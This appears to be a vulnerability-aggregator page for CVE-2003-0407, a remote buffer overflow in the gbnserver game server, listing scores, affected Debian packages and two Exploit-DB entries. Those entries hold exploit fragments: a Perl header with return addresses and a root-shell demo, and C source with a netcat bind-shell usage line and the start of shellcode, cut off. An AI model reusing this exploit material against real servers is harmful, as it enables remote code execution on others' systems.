CVE-2003-0407
published 2003-06-30CVE-2003-0407: Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
PriorityP341critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
16.35%
96.6th percentile
Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | gbatnav | < gbatnav 1.0.4-4 (bookworm) | gbatnav 1.0.4-4 (bookworm) |
| gnome | batalla_naval | — | — |
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qwjj-948r-x92x: Buffer overflow in gbnserver for Gnome Batalla Naval 1
ghsa_unreviewed·2022-04-29
CVE-2003-0407 [HIGH] GHSA-qwjj-948r-x92x: Buffer overflow in gbnserver for Gnome Batalla Naval 1
Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
OSV
CVE-2003-0407: Buffer overflow in gbnserver for Gnome Batalla Naval 1
osv·2003-06-30·CVSS 10.0
CVE-2003-0407 [CRITICAL] CVE-2003-0407: Buffer overflow in gbnserver for Gnome Batalla Naval 1
Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
Debian
CVE-2003-0407: gbatnav - Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attacke...
vendor_debian·2003·CVSS 10.0
CVE-2003-0407 [CRITICAL] CVE-2003-0407: gbatnav - Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attacke...
Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
Scope: local
bookworm: resolved (fixed in 1.0.4-4)
bullseye: resolved (fixed in 1.0.4-4)
forky: resolved (fixed in 1.0.4-4)
sid: resolved (fixed in 1.0.4-4)
trixie: resolved (fixed in 1.0.4-4)
No detection rules found.
Exploit-DB
Batalla Naval 1.0 4 - Remote Buffer Overflow (1)
exploitdb·2003-05-26
CVE-2003-0407 Batalla Naval 1.0 4 - Remote Buffer Overflow (1)
Batalla Naval 1.0 4 - Remote Buffer Overflow (1)
---
source: https://www.securityfocus.com/bid/7699/info
Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server.
#!/usr/bin/perl
# Priv8security.com remote exploit for Gnome Batalla Naval Server v1.0.4
#
# Game url http://batnav.sourceforge.net/
# Tested against Mandrake 9.0
#
# [wsxz@localhost buffer]$ perl priv8gbn.pl 127.0.0.1
# Connected!
# [+] Using ret address: 0xbffff3a2
# [+] Using got address: 0x804f8dc
# [+] Sending stuff...
# [+] Done ;pPPp
# [?] Now lets see if we got a shell...
# [+] Enjoy your stay on this server =)
# Linux wsxz.box 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
i68
Exploit-DB
Batalla Naval 1.0 4 - Remote Buffer Overflow (2)
exploitdb·2003-05-26
CVE-2003-0407 Batalla Naval 1.0 4 - Remote Buffer Overflow (2)
Batalla Naval 1.0 4 - Remote Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/7699/info
Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server.
/*
*by jsk for gbnserver remote exploit demo
* example:(./gbnex;cat )|nc 127.0.0.1 1995
* ctrol c
* ./nc 127.0.0.1 30464
* id
* uid=508(sa2) gid=508(sa2) groups=508(sa2)
*2003-6-2
*welcome to http://www.ph4nt0m.net & www.patching.net
*ths warning3
*/
#include
#include
#define NOP 0x90
#define OFFSET 100
#define bufsize 584
char shellcode[] =
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x02" /* movb $0x2,%al */
"\xcd\x80" /* int $0x80 */
"\x85\xc0" /* testl %eax,%eax */
"\x75\x43" /* j
No writeups or analysis indexed.
2003-06-30
Published